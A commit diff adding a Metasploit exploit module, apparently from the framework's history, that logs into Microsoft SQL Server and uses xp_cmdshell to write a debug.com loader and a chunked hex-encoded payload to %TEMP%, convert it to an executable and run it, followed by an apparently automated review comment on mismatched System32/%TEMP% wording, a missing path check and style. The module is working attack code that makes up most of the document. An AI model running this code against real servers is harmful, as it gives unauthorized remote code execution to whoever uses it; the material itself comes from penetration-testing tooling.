Adds ReL1K's mssql_payload module
git-svn-id: file:///home/svn/framework3/trunk@7162 4d416f70-5f16-0410-b530-b9f4589650da
unstable
parent
3b49e2af58
commit
59676df4db
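--- /dev/null
+++ b/mssql_payload.rb
@@ -0,0 +1,99 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+
+include Msf::Exploit::Remote::MSSQL
+
+def initialize(info = {})
+
+super(update_info(info,
+'Name' => 'Microsoft SQL Server Payload Execution',
+'Description' => %q{
+This module will execute an arbitrary payload on a Microsoft SQL
+Server, using the Windows debug.com method for writing an executable to disk
+and the xp_cmdshell stored procedure. File size restrictions are avoided by
+incorporating the debug bypass method presented at Defcon 17 by SecureState.
+Note that this module will leave a metasploit payload in the Windows
+System32 directory which must be manually deleted once the attack is completed.
+},
+'Author' => [ 'David Kennedy "ReL1K" <kennedyd013[at]gmail.com>' ],
+'License' => MSF_LICENSE,
+'Version' => '$Revision$',
+'References' =>
+[
+
+[ 'URL', 'http://www.thepentest.com/presentations/FastTrack_ShmooCon2009.pdf'],
+],
+'Platform' => 'win',
+'Targets' =>
+[
+[ 'Automatic', { } ],
+],
+'DefaultTarget' => 0
+))
+
+register_options( [
+OptPath.new('HEX2BINARY', [ false, "The path to the hex2binary script on the disk",
+File.join(Msf::Config.install_root, "data", "exploits", "mssql", "h2b")
+])
+], self.class)
+end
+
+def exploit
+
+var_bypass = rand_text_alpha(8)
+var_payload = rand_text_alpha(8)
+
+debug = false # enable to see the output
+
+if(not mssql_login_datastore)
+print_status("Invalid SQL Server credentials")
+return
+end
+
+print_status("Warning: This exploit will leave #{var_payload}.exe in the System32 directory of the target")
+
+hex = Msf::Util::EXE.to_win32pe(framework,payload.encoded).unpack("H*")[0]
+
+print_status("Writing the debug.com loader to the disk...")
+h2b = File.read(datastore['HEX2BINARY'], File.size(datastore['HEX2BINARY']))
+h2b.gsub!(/KemneE3N/, "%TEMP%\\#{var_bypass}")
+h2b.split(/\n/).each do |line|
+mssql_xpcmdshell("#{line}", false)
+end
+
+print_status("Converting the debug script to an executable...")
+mssql_xpcmdshell("cmd.exe /c cd %TEMP% && cd %TEMP% && debug < %TEMP%\\#{var_bypass}", debug)
+mssql_xpcmdshell("cmd.exe /c move %TEMP%\\#{var_bypass}.bin %TEMP%\\#{var_bypass}.exe", debug)
+
+print_status("Uploading the payload, please be patient...")
+idx = 0
+cnt = 500
+while(idx < hex.length - 1)
+mssql_xpcmdshell("cmd.exe /c echo #{hex[idx,cnt]}>>%TEMP%\\#{var_payload}", false)
+idx += cnt
+end
+
+print_status("Converting the encoded payload...")
+mssql_xpcmdshell("cmd.exe /c %TEMP%\\#{var_bypass}.exe %TEMP%\\#{var_payload}", debug)
+mssql_xpcmdshell("cmd.exe /c del %TEMP%\\#{var_bypass}.exe", debug)
+mssql_xpcmdshell("cmd.exe /c del %TEMP%\\#{var_payload}", debug)
+
+print_status("Executing the payload...")
+mssql_xpcmdshell("cmd.exe /c %TEMP%\\#{var_payload}.exe", false, {:timeout => 1})
+
+handler
+disconnect
+end
+end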
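Review bot: The module description (`Note that this module will leave a metasploit payload in the Windows System32 directory`) and the warning printed at the top of `exploit` both name System32, but every xp_cmdshell command in the hunk writes, converts and runs the loader and payload under `%TEMP%`, so the documented artifact location disagrees with the code. Unless the SQL Server service account's %TEMP% happens to resolve to System32, both strings should name the directory the commands actually use, e.g. `print_status("Warning: This exploit will leave #{var_payload}.exe in the %TEMP% directory of the target")`, so that the leftover file is described accurately for whoever has to find and remove it afterwards. Separately, `File.read(datastore['HEX2BINARY'], File.size(datastore['HEX2BINARY']))` runs with no check that the option is set and points at a readable file even though `HEX2BINARY` is registered as optional (`false`), so a missing or misconfigured path surfaces as a raw `TypeError`/`Errno::ENOENT` after credentials have already been used; a guard such as `raise ArgumentError, "HEX2BINARY must point to a readable file" unless datastore['HEX2BINARY'] && File.readable?(datastore['HEX2BINARY'])` placed before the login would fail early with a clear message. As a point of style, `mssql_xpcmdshell("#{line}", false)` interpolates a string into a string and can simply be `mssql_xpcmdshell(line, false)`, and `if(not mssql_login_datastore)` reads more naturally as `unless mssql_login_datastore`.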